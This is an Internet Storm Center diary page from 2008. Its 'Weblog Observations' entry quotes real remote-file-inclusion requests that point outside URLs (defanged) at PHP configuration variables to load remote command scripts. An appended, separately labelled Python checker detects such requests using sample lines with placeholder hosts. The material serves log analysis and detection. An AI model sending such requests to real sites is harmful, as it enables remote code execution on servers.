
SANS ISC: InfoSec Handlers Diary Blog - Internet Storm Center Diary 2008-07-10



Podcast Episode Eight Posted

Published: 2008-07-10
Last Updated: 2008-07-10 19:51:34 UTC
by Joel Esler (Version: 2)
0 comment(s)

Thanks to all of those who joined us live last night!  It was great to have that live feedback.  Johannes and I were all live on video and audio, and despite a few hiccups, it was great.  It turns out that we have a great discussion AFTER the live podcast with all the people that are live (you must be a registered stickam member to be able to participate).  I think I may start recording that portion as well, maybe we'll publish that as well!

We published Episode Eight of the Internet Storm Center Podcast last night after the recording.

It would be great if we could increase the live listener count, as I'd like to do a live Q&A with the listeners (and other fun live events).

Go grab it through iTunes.

Direct download of the mp3 is here, for those of you that are not iTunes users.

--

Joel Esler

http://www.joelesler.net


One Bushel of Apple Updates

Published: 2008-07-10
Last Updated: 2008-07-10 16:31:52 UTC
by Johannes Ullrich (Version: 1)
0 comment(s)

Apple is updating many systems this week (in particular today) to get ready for the iPhone 3G launch and the new "MobileMe" software. It's not exactly within our scope to cover product updates or releases like that. However, some of the updates released today are security relevant. For example, the new AppleTV software includes a number of security patches. A new version of QuickTime (7.7.0.43) was released as well (thanks David!).

It is not clear if the new version of iTunes (7.7) released today includes any security fixes.

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute


Weblog Observations

Published: 2008-07-10
Last Updated: 2008-07-10 16:18:16 UTC
by Johannes Ullrich (Version: 1)
1 comment(s)

In this diary, I will share a few odd log entries from our ISC web logs from the last couple of days. Not all of them are attacks. In some cases they look like honest mistakes, in others I am not sure what is going on ;-) ... and of course, there are also some genuine attacks here:

Buggy RSS Reader?

Here is a request from earlier today. It triggered an alert because it exceeded the maximum request variable name length:

rss</administrator/components/com_peoplebook/param_peoplebook_php?mosConfig_absolute_path

This looks to me like a buggy RSS reader. We append 'rss' to links in our RSS feed. The remaining "tags" don't look like XSS, so in my opinion this is not an attack.

Remote File Insertion

GET /index.html?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&
GLOBALS=&mosConfig_absolute_path=hxxp: // www. csccog. org/mambots/system/.bash/did.txt?

GET //index.php?_SERVER[DOCUMENT_ROOT]= hxxp: // rosenkrieger . herateam .de/phpRaider
 /authentication/phpbb3/cmd.txt

Now these are "genuine" attacks. The goal here is to overwrite variables (such as the configuration path) and use them for remote file inclusion and execution attacks. I modified the URLs to prevent accidental clicking. They shouldn't cause any harm to the browser, but you never know...

More Client Bugs? Or someone playing?

GET /diary.html?date=2005%C2%AD05%C2%AD09%E2%80%93%00%00

With this one, I am not sure. The request was blocked because it included a '%00' (null byte) at the end. The parameter should be a date in YYYY-MM-DD format. Oddly enough, there was no referer set, but the user agent looked "legit" (easily faked... I know). The same IP address sent other (valid) requests with the same user agent. However, these other requests included cookies, while this particular one didn't... hm. Maybe it's someone playing after all? Using a proxy to manipulate requests?

Monster Cookie from Hell.

This request included 3 oddly formatted (and very long) cookies. The cookie names are pc1, pv1, bh and ih. "ih" is by far the longest, about 1180 characters long! The cookies all look very similar. Here is the shortest one (pc1):

pc1=\"b!!!!#!!,Ms!!E(x!!PQ4!#0Lh!!I7JGfb<6!!mT+'k4o:!w1K*!!28a!![
<K!![h(~~~~~:7LG_:7e@YM.jTN\";

The one "feature" that sticks out is the large number of exclamation marks (even more so in the other values).

In conclusion: Keep checking your logs! Let us know if you see something odd... or if you have more details about the logs I posted above.
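As an added example (not part of the diary or of the ISC's own tooling), here is a small Python checker that applies the observations above to sample request lines: over-long variable names, attempts to overwrite PHP superglobals or mosConfig_absolute_path with a remote URL, NUL bytes in parameters, and a date parameter that is not YYYY-MM-DD. The thresholds, the prefix list and the example.invalid hosts in the constructed sample lines are my assumptions.

```python
import re
from urllib.parse import parse_qsl

# Thresholds and name lists are assumptions chosen for this example,
# not the ISC's actual filtering rules.
MAX_NAME_LEN = 32   # the "maximum request variable name length" alert
OVERWRITE_PREFIXES = ("globals", "_request", "_server", "_get", "_post",
                      "_cookie", "mosconfig_")
URL_RE = re.compile(r"^\s*(?:h[tx]{2}ps?|ftp)://", re.I)  # accepts defanged hxxp
DATE_RE = re.compile(r"^\d{4}-\d{2}-\d{2}$")
DATE_PARAMS = {"date"}   # parameters that must be YYYY-MM-DD

def inspect_request(request_line):
    """Return a list of findings for one 'METHOD target HTTP/x.y' request line."""
    parts = request_line.split()
    target = parts[1] if len(parts) > 1 else request_line
    _path, _, query = target.partition("?")
    findings = []
    # parse_qsl percent-decodes names and values, so %00 becomes a real NUL byte
    for name, value in parse_qsl(query, keep_blank_values=True):
        if len(name) > MAX_NAME_LEN:
            findings.append(f"long-name:{len(name)}")
        if name.lower().startswith(OVERWRITE_PREFIXES):
            findings.append(f"superglobal-overwrite:{name}")
        if URL_RE.match(value):
            findings.append(f"remote-url:{name}")
        if "\x00" in name or "\x00" in value:
            findings.append(f"null-byte:{name}")
        if name in DATE_PARAMS and not DATE_RE.match(value):
            findings.append(f"bad-date:{value!r}")
    return findings

def scan(lines):
    """Map each request line that produced findings to its findings."""
    return {line: f for line in lines if (f := inspect_request(line))}

# Constructed sample request lines modelled on the requests quoted in the
# diary; example.invalid stands in for the real hosts.
SAMPLE_LOG = [
    "GET /diary.html?date=2008-07-10 HTTP/1.1",
    "GET /diary.html?rss</administrator/components/com_peoplebook/param_peoplebook_php?mosConfig_absolute_path HTTP/1.1",
    "GET /index.html?_REQUEST=&_REQUEST%5boption%5d=com_content&GLOBALS=&mosConfig_absolute_path=http://example.invalid/did.txt? HTTP/1.1",
    "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://example.invalid/cmd.txt HTTP/1.1",
    "GET /diary.html?date=2005%C2%AD05%C2%AD09%E2%80%93%00%00 HTTP/1.1",
]

if __name__ == "__main__":
    for line, found in scan(SAMPLE_LOG).items():
        print(line.split()[1], "->", ", ".join(found))
```

Run against a real access log, the request line is the second quoted field of each entry; the checks are deliberately narrow so they can be tuned to the parameters your own site actually uses.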


------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
